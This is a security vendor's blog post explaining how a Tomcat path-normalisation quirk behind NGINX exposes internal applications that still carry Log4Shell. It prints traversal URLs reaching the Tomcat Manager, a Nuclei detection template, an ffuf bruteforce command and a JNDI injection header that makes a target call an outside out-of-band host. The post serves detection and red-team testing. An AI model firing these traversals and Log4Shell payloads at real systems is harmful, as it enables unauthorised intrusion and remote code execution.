Log4Shell Is Dead! Long Live Log4Shell!

As part of our Continuous Automated Red Teaming and Attack Surface Management technology - the watchTowr Platform - we're incredibly proud of our ability to discover nested, exploitable vulnerabilities across huge attack surfaces.

Sometimes, we see old vulnerabilities appear - accessible and exploitable only via unusual pathways, or by abusing unintended behaviour. In this blog post, we'll be talking about our experience of building the watchTowr Platform to highlight these behaviours and chain exploitation - using Log4Shell as an example that we commonly see.

To this day, the watchTowr Platform regularly and autonomously finds Log4Shell in trivially exploitable situations across wide attack surfaces - primarily due to its ubiquitous nature.

But most interestingly, when chaining vulnerabilities together, we see Log4Shell appear in majestic, beautiful ways.

'Log4Shell' is a word that causes trauma, stress and a range of other feelings in security practitioners - even 18+ months after disclosure of the initial vulnerability.

As a brief refresher, Log4Shell set most of the Internet on fire in December 2021 - when a code execution vulnerability was discovered in one of the most prevalent and widely used Java logging packages (Log4J). The security world sprang into action, identifying vulnerable systems, working out what was exploitable (with the help of technology like the watchTowr Platform), and remediating rapidly.

18+ months later, Log4Shell has persisted - in various forms. Given the prevalence of Log4J, in most enterprise environments everything was vulnerable. Prioritisation was therefore key to handling the massive remediation task - focused on hosts and systems that could be exploited via the Internet (regardless of whether the attacker-controlled input was processed first-order, second-order, third-order, and so on).

Log4Shell was dead! Well, not quite...

But let's start with... "unusual behaviour".

Tomcat Path Normalisation

Path Normalisation is well-trodden ground, with plenty of fantastic prior art covering it.

But, as a simple summary:

When utilising NGINX's 'proxy_pass' functionality, NGINX (and other reverse proxies) can forward all incoming requests aimed at a specific path (let's use '/publicfolder' in this example) to another server - for the purpose of this example, let's say they're passed to 'http://internal/app1/'. NGINX's documentation has a brief explainer on 'proxy_pass' if you need a refresher.
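
As a concrete sketch, such a rule might look like the below - the upstream name and paths are purely illustrative assumptions for this example, not a real configuration:

location /publicfolder/ {
    # Forward everything under /publicfolder/ to the internal Tomcat-hosted application
    proxy_pass http://internal/app1/;
}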

If we "visualise" typical architecture, it might look like the following:

NGINX <> Tomcat <> Target Application

Now, a few things worth noting:

  • NGINX considers "..;" to be a folder name, so a URL like "http://publicserver/publicfolder/..;/" is likely to match a configured proxy_pass rule and forward the request to the Tomcat server.
  • The Tomcat server, however, treats ";" as the start of a path parameter and strips it, so it considers "..;" to indicate path traversal - translating the forwarded URI to /app1/../

In this scenario, where unusual behaviour has been identified, an attacker could use the following example URL to traverse out of the intended path: http://targetserver/publicfolder/..;/manager/html. The request will be forwarded to http://internal/app1/../manager/html, which ultimately becomes http://internal/manager/html.

As the example above shows, this is commonly (and somewhat uninspiredly) used and abused to access Tomcat management interfaces - i.e. the Tomcat Manager - which would otherwise not be exposed to the Internet.

But - as I'm sure anyone reading this post has already determined - there is a lot more we can realistically do with this: reaching other applications/servlets on the server that may only be accessible to localhost, traversing to different controllers of the initial application, or even reaching entirely different applications.

In short, we're suddenly exposed to significantly more attack surface (more application code, servlets, etc.) that was never expected to be exposed to the Internet.

Long Live Log4Shell!

So, how is this relevant to Log4Shell?

As briefly mentioned - if we can begin to traverse outside of the expected application, it's plausible that we may reach systems, applications and servlets (and any variation in between) that were de-prioritised during Log4Shell patching and remediation, given the understandable belief that exploitation via the Internet should, in theory, not have been possible.

This means we can chain these two behaviours to still find vulnerable systems at scale, using the following process:

  1. Identify systems that show signs of path normalisation behaviour
  2. Identify exposed extra attack surface via the path normalisation behaviour
  3. Send benign Log4Shell payloads to the enumerated extra attack surface

Identify systems that show signs of path normalisation behaviour

We can use the following blunt-but-simple Nuclei template to identify systems that show unusual behaviour:

id: path-normalization-find-the-behaviour-wt
info:
  name: Tomcat Path Normalisation Behaviour Detection
  author: watchTowr
  severity: info
  description: Identifying path normalization behaviour at scale
  tags: tomcat,path-normalization

http:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |+
        GET {{RootURL}}/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/ HTTP/1.1
        Host: {{Hostname}}

      - |+
        GET {{RootURL}}/..;/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
    - type: dsl
      dsl:
        - "status_code_1 != 400 && status_code_2 == 400 && status_code_3 != 400"

    extractors:
    - type: dsl 
      dsl:
        - status_code_1 
        - status_code_2 
        - status_code_3

The configured matchers pose the following questions regarding the responses:

  1. Does a request to the root path return normally - i.e. not a 400 Bad Request error?
  2. Does an unusual number of ..;/ traversals lead to a 400 error?
  3. Does a single ..;/ traversal on the root not result in a 400 error?

Should these behaviours be observed, it's worth investigating further. While false positives (FPs) remain possible with this blunt detection mechanism in front of certain proxies, the likelihood is high that the request is being processed at a different layer, introducing a new attack surface - and thus, for the purposes of automation, we can work off this.
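
If you'd like to reproduce this yourself, save the template and point Nuclei at a list of targets - the template filename and target list below are just placeholders:

$ nuclei -t path-normalization-find-the-behaviour-wt.yaml -l targets.txt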

Identify exposed extra attack surface via the path normalisation behaviour

This is now as simple as bruteforcing for content and applications, using the aforementioned path normalisation. An example command is below to demonstrate the simplicity:

$ ffuf -c -w wordlist.txt -u "https://watchtowr.com/..;/FUZZ"
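
If the results are noisy, ffuf's standard filters help narrow things down - for example, filtering out 404 responses (the wordlist and target here are, again, placeholders):

$ ffuf -c -w wordlist.txt -u "https://watchtowr.com/..;/FUZZ" -fc 404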

Send benign Log4Shell payloads to the enumerated extra attack surface

Assuming the step above provides us with enumerated attack surface, we can send benign Log4Shell payloads in various formats to this newly enumerated attack surface - and watch for interactions against our out-of-band (OOB) infrastructure to confirm that a vulnerable Log4J instance processed them.

Below is an example, illustrating the simplicity of combining an identified path normalisation issue with a known existing vulnerability (Log4Shell).

GET /..;/exampleappname/ HTTP/1.1
Host: watchtowr.com
Accept: ${jndi:ldap://oob.watchtowr.com/watchtowr.class}

Conclusion

I hope you enjoyed this look at how we typically chain strange behaviour with highly exploitable weaknesses - at scale.

Whilst nothing described above is necessarily bleeding-edge, as a team we're suckers for ways in which we can use unintended behaviour to exploit real vulnerabilities - at scale. These concepts are extrapolated and loaded into the watchTowr Platform - allowing for the detection of unusual behaviour and further exploitation.

At watchTowr, we believe continuous security testing is the future, enabling the rapid and holistic identification of exploitable vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please contact us.